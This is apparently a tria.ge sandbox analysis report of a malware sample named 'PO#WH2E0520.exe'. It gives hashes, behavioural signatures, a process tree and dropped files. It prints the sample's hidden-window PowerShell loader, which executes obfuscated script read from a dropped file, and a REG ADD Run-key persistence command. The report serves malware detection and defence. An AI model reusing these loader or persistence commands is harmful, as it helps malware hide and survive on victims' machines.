Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
13/06/2024, 09:38
Static task
static1
Behavioral task
behavioral1
Sample
PO#WH2E0520.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
PO#WH2E0520.exe
Resource
win10v2004-20240508-en
General
-
Target
PO#WH2E0520.exe
-
Size
988KB
-
MD5
328c8f1b566488c8e7f8cd0951c173d4
-
SHA1
2c45dce433d4dd782f0ed7c9a62494a1bdce13aa
-
SHA256
d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8
-
SHA512
d0579cfd4fd61c611b8af986f8579e563f2abac814b260455e5d810076d609ff82bf8d7c7473ec3542e6035265308cb9bbf4fc7d9fb98b468bae74c12883367f
-
SSDEEP
24576:V4ezTAAfvu922zkq9+qDlcv3sWhegcKyJc:V4WAAfD2zk47lG3sWhegcXO
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2900 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2900 powershell.exe 2800 Nepotism.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Disadvantageous94 = "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\\Skidens\\').Scottify;%Curio% ($Nonexportation)" reg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\driftschefernes.ini PO#WH2E0520.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2900 powershell.exe 2800 Nepotism.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2900 set thread context of 2800 2900 powershell.exe 32 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\twig\Monetising.lnk PO#WH2E0520.exe File opened for modification C:\Program Files (x86)\inspiredly.snu PO#WH2E0520.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\undispersing\frelserens.ini PO#WH2E0520.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 2464 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2900 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1960 wrote to memory of 2900 1960 PO#WH2E0520.exe 28 PID 1960 wrote to memory of 2900 1960 PO#WH2E0520.exe 28 PID 1960 wrote to memory of 2900 1960 PO#WH2E0520.exe 28 PID 1960 wrote to memory of 2900 1960 PO#WH2E0520.exe 28 PID 2900 wrote to memory of 2648 2900 powershell.exe 30 PID 2900 wrote to memory of 2648 2900 powershell.exe 30 PID 2900 wrote to memory of 2648 2900 powershell.exe 30 PID 2900 wrote to memory of 2648 2900 powershell.exe 30 PID 2900 wrote to memory of 2800 2900 powershell.exe 32 PID 2900 wrote to memory of 2800 2900 powershell.exe 32 PID 2900 wrote to memory of 2800 2900 powershell.exe 32 PID 2900 wrote to memory of 2800 2900 powershell.exe 32 PID 2900 wrote to memory of 2800 2900 powershell.exe 32 PID 2900 wrote to memory of 2800 2900 powershell.exe 32 PID 2800 wrote to memory of 2616 2800 Nepotism.exe 33 PID 2800 wrote to memory of 2616 2800 Nepotism.exe 33 PID 2800 wrote to memory of 2616 2800 Nepotism.exe 33 PID 2800 wrote to memory of 2616 2800 Nepotism.exe 33 PID 2616 wrote to memory of 2464 2616 cmd.exe 35 PID 2616 wrote to memory of 2464 2616 cmd.exe 35 PID 2616 wrote to memory of 2464 2616 cmd.exe 35 PID 2616 wrote to memory of 2464 2616 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\PO#WH2E0520.exe"C:\Users\Admin\AppData\Local\Temp\PO#WH2E0520.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Infanterienheden=Get-Content 'C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Antiprelatism.Syn';$Potentializes=$Infanterienheden.SubString(17231,3);.$Potentializes($Infanterienheden)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2648
-
-
C:\Users\Admin\AppData\Local\Temp\Nepotism.exe"C:\Users\Admin\AppData\Local\Temp\Nepotism.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Disadvantageous94" /t REG_EXPAND_SZ /d "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\Skidens\').Scottify;%Curio% ($Nonexportation)"4⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Disadvantageous94" /t REG_EXPAND_SZ /d "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\Skidens\').Scottify;%Curio% ($Nonexportation)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2464
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD5a29b610601c6446ca5d925ff29d27383
SHA1f80a215550b22baed58aac08bfed5726f0d7de60
SHA256ed86d585901199bf8b1859e868b006718c326a5b2c1d27c7f69554f2f37e5107
SHA512b159fd355542170bbfdf093cbfb6f8da169209f076cb2cb79d94af0146d0a04a4dd44a328b389bcf2fa333ad0ce14424bbf89c5e93e1160cadb4469f66184b6e
-
Filesize
292KB
MD50e1c858b4256ec39ba6b617927aee0ca
SHA1726e462e1e9e41270174722405625cb96509b30b
SHA25688c6e14cb89d04fb1fab4fc45f62c903af1a9981622260de27cdb7e3e853b782
SHA5123c6949dec4abf79b735b8c50beec3c3fcafec17aef17da5b10ddfeaab3d5dbcc590efe0e8b706a1706b5054c1cd6b55c37aa3fbbacd5553259f33a9ca8a8ee1e
-
Filesize
988KB
MD5328c8f1b566488c8e7f8cd0951c173d4
SHA12c45dce433d4dd782f0ed7c9a62494a1bdce13aa
SHA256d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8
SHA512d0579cfd4fd61c611b8af986f8579e563f2abac814b260455e5d810076d609ff82bf8d7c7473ec3542e6035265308cb9bbf4fc7d9fb98b468bae74c12883367f